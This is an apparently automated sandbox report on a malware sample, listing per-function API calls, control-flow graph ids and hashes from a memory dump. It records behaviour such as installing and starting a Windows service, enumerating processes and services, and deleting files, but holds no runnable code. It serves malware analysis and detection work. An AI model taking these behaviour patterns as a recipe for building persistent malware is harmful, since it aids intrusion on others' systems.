                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 785 1645a9-164637 call 160610 call 16fde0 call 159410 call 171660
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: bfd0829247956772bdd8471333a8a263eff98c5e69947d433bafc4494db83330
                                                                                                                                                                                                            • Instruction ID: 79393dc8eedb8d78068f854f1d3d96820b88099698812382f07167b77e973e2e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfd0829247956772bdd8471333a8a263eff98c5e69947d433bafc4494db83330
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D61104755502068BC714AF74FE894253BF0FB55346325452AE04696DB5EB3086E1CB82
                                                                                                                                                                                                            Function 00142800 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 795 142800-142832 call 16b150 798 142834 795->798 799 14283e-142842 ExitProcess 795->799 798->799
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: a6e9de3245b5161842192eea3b4aacc7f914e0cfb3f3aaf760300ecdab966f0a
                                                                                                                                                                                                            • Instruction ID: a07e79358fcdb384baf0eb726059429aa817269585d175b227b1520268001373
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6e9de3245b5161842192eea3b4aacc7f914e0cfb3f3aaf760300ecdab966f0a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FE08C78000209DBC328DF28E8D687A37B5AB84348394C11EE91A4BE70CB35E4C5CF81
                                                                                                                                                                                                            Function 0014A4E0 Relevance: 1.3, APIs: 1, Instructions: 33stringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 800 14a4e0-14a53a lstrlen 801 14a53c-14a548 800->801 802 14a54e-14a564 800->802 801->802
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1659193697-0
                                                                                                                                                                                                            • Opcode ID: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
                                                                                                                                                                                                            • Instruction ID: 1e7763b11c5200db3712b05806d599bd6850ffa4db8f98c1eab530ff360ec9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0CD71600220EFC3025F21FD4D5663BB8FF893613840512E48A86974E77489E2DFD2

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00150500 Relevance: 13.7, APIs: 9, Instructions: 170serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00150537
                                                                                                                                                                                                            • CreateServiceA.ADVAPI32(00000000,012532A8,012532A8,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00150596
                                                                                                                                                                                                            • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00150615
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015062A
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 001506A7
                                                                                                                                                                                                            • OpenServiceA.ADVAPI32(00000000,012532A8,00000010), ref: 001506EB
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015072D
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0015073E
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 001507A8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3525021261-0
                                                                                                                                                                                                            • Opcode ID: b8b4f44c17c0bc74e276535aa552d30ab99f5524378763319dc805df7666e641
                                                                                                                                                                                                            • Instruction ID: ff063a97b803de87bef5ecaa9953c4dd416f2eb688c892f462b62d6c0cfe8f4a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8b4f44c17c0bc74e276535aa552d30ab99f5524378763319dc805df7666e641
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D610131A01314EFD3069F60FC8AB253FB4FB88B11F518605E842AAEB4E77496E5CB45
                                                                                                                                                                                                            Function 0014AF20 Relevance: 7.9, APIs: 5, Instructions: 385serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 0014B0AA
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 0014B15A
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0014B17A
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 0014B216
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0014B41C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1579346331-0
                                                                                                                                                                                                            • Opcode ID: 331cf4f33daa062ab1d3b483cf07c2dfc8ec10dad8647be868cd077e006811b0
                                                                                                                                                                                                            • Instruction ID: a0f2b06d3ada50d015d75a2ad3a634f7f9534579d36afb4ae1e502eb1c4fd254
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 331cf4f33daa062ab1d3b483cf07c2dfc8ec10dad8647be868cd077e006811b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42F143B2A05201EFC304DF64FCC9A6A3BB1FB94350B15421AE54697EB5E730DAE4CB81
                                                                                                                                                                                                            Function 00169580 Relevance: 7.7, APIs: 5, Instructions: 220filesleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00000001), ref: 00169679
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 001697B8
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 001698A9
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 001698CB
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 001698E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextSleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1528862845-0
                                                                                                                                                                                                            • Opcode ID: 4cedb6e00ea1a001223a52bf3e07025e40a3e96bfd2fc7d6ed234a5740a58e8b
                                                                                                                                                                                                            • Instruction ID: 4b7ec12d77ae79b803ec06132f6e0ec141d2224b252409d7c9888dc2bb5e892e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cedb6e00ea1a001223a52bf3e07025e40a3e96bfd2fc7d6ed234a5740a58e8b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3914375901205DFC714DF34FC86AA53BB9FB98704B40861AE94687E70EB348AE1CF91
                                                                                                                                                                                                            Function 00156C10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 187registrysynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(012532A8,Function_00011860), ref: 00156D72
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,001B05F8), ref: 00156DD5
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00156DE9
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,001B05F8), ref: 00156E8A
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00156EBE
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,001B05F8), ref: 00156F2B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00156F42
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,001B05F8), ref: 00156FAA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
                                                                                                                                                                                                            • String ID: =ZMI
                                                                                                                                                                                                            • API String ID: 3399922960-150576250
                                                                                                                                                                                                            • Opcode ID: a205d31f3086a2e8d2777c3a776bb635b6cd40c20c3db5d3f5931fbdff293a38
                                                                                                                                                                                                            • Instruction ID: 5a1c3a6e04a96dff3e1d90b3f17175ac5cad2d66a39274963f12cd4536c4cc8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a205d31f3086a2e8d2777c3a776bb635b6cd40c20c3db5d3f5931fbdff293a38
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E91DBB1901301CFC306DF28FD8A9663FB4FB88715781821AE49586EB4E73885E5CF85
                                                                                                                                                                                                            Function 00154380 Relevance: 10.9, APIs: 7, Instructions: 387processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001544A7
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 001545C2
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 001547CE
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00154842
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0000000A), ref: 0015495A
                                                                                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 001549AD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00154A20
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 930127669-0
                                                                                                                                                                                                            • Opcode ID: c2d4bd66a5cd0989c8173c72a25ea1fd3aed0103977415bf54743e44424b37d3
                                                                                                                                                                                                            • Instruction ID: b7f0551deb72147bec76d60c7128754b5d8e8aecf9e3f1e2f017552fc06afc34
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d4bd66a5cd0989c8173c72a25ea1fd3aed0103977415bf54743e44424b37d3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55F16771A00601DFD304CF25FC89A753BB5FB88315B51825AE84A87EB4EB748AE9CF51
                                                                                                                                                                                                            Function 0014CA40 Relevance: 10.8, APIs: 7, Instructions: 345fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 0014CB20
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 0014CB5D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014CBBD
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0014CC1D
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0014CED4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0014CF0E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014CF47
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseCreateHandle$CountReadTickWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3478262135-0
                                                                                                                                                                                                            • Opcode ID: f5b99e6a369382524b0f43eccf478a10086ac918bd0f362fcceb32a3a7009806
                                                                                                                                                                                                            • Instruction ID: 22b809317a1e8f4ceabd0f7e90db9fa3d01592c38e56970ef6dbfb3cb24e9e0a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5b99e6a369382524b0f43eccf478a10086ac918bd0f362fcceb32a3a7009806
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54E14671A01200EFD304EF24FD89A693BB5FB94710F11421AE9569BEF4EB308AD5CB95
                                                                                                                                                                                                            Function 0014BBC0 Relevance: 10.7, APIs: 7, Instructions: 205processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0014BCE3
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014BDDD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3397401024-0
                                                                                                                                                                                                            • Opcode ID: 090026f7b67d7041bf3c12b2170c76f33d7a6ed27cb2576847ce17b7965815de
                                                                                                                                                                                                            • Instruction ID: 7a2530460fd01909547851a5077a9f467e3d0dd6411ff288c9576712f78708c7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 090026f7b67d7041bf3c12b2170c76f33d7a6ed27cb2576847ce17b7965815de
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B891FE75A04215DFC704DF24FCD6AAA3BB5FB98314B05815AE40693EB4EB349AD4CB40
                                                                                                                                                                                                            Function 00151530 Relevance: 9.2, APIs: 6, Instructions: 176filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 001515C3
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,?), ref: 0015168A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 001516A7
                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00151715
                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00151774
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00151792
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
